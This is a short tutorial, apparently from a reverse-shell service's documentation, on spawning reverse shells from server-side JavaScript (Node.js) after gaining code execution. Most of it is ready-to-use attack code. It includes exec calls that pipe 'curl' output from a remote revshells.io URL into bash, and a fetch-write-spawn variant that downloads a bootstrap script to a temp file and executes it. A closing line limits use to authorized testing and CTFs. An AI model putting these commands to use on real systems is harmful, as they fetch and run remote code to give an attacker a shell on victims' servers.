JavaScript reverse shell with revshells.io

Browser JavaScript cannot open a raw reverse TCP shell to your laptop. Server-side JavaScript (Node.js, Deno, Electron, SSRF-to-shell gadgets) can spawn a process that pulls your revshells.io bootstrap — same model as bash or Python callbacks.

1. Create a session

Create a session at revshells.io and copy the session ID.

2. Node.js child_process

const { exec } = require('child_process');
exec('curl -fsSL https://revshells.io/SESSION-ID/revshell | bash');

ESM:

import { exec } from 'node:child_process';
exec('curl -fsSL https://revshells.io/SESSION-ID/nopty | bash');

3. fetch + write + spawn (no curl)

import { execFile } from 'node:child_process';
import fs from 'node:fs/promises';
import os from 'node:os';
import path from 'node:path';

const res = await fetch('https://revshells.io/SESSION-ID/revshell');
const body = await res.text();
const file = path.join(os.tmpdir(), 'rs-bootstrap.sh');
await fs.writeFile(file, body, { mode: 0o700 });
execFile('/bin/bash', [file]);

4. Browser vs server-side

• Browser: use revshells.io as the operator UI only — you do not catch shells in the victim's Chrome tab.
• Server-side JS: treat it like any other RCE — run the bootstrap, then attach from the hub.

For authorized security testing, CTFs, and lab environments only.